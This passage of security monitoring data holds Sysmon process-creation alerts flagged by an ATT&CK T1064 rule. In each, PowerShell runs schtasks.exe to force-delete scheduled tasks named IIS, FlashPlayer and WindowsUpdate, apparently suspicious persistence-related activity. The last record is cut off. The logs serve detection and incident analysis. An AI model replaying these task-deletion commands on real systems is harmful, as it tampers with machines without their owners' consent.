2020-05-28 12:49:36.818 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e2d71900} +ProcessId: 772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.820618600Z"",""eventRecordID"":""2227"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.818\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010e2d71900}\r\nProcessId: 772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.818"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010e2d71900}"",""processId"":""772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.227",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.794 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001053d61900} +ProcessId: 6028 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.797269700Z"",""eventRecordID"":""2226"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.794\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001053d61900}\r\nProcessId: 6028\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.794"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001053d61900}"",""processId"":""6028"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.212",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.764 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c3d41900} +ProcessId: 2560 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.768054500Z"",""eventRecordID"":""2225"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.764\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c3d41900}\r\nProcessId: 2560\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:36.764"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c3d41900}"",""processId"":""2560"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.196",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.726 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001032d31900} +ProcessId: 3932 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.732158700Z"",""eventRecordID"":""2224"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.726\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001032d31900}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.726"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001032d31900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.181",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.698 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010a3d11900} +ProcessId: 6940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.700655000Z"",""eventRecordID"":""2223"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.698\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010a3d11900}\r\nProcessId: 6940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.698"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010a3d11900}"",""processId"":""6940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.165",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.675 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001013d01900} 
+ProcessId: 6228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.677802100Z"",""eventRecordID"":""2222"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.675\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001013d01900}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.675"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001013d01900}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.118",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.642 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001069ce1900} +ProcessId: 6732 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} 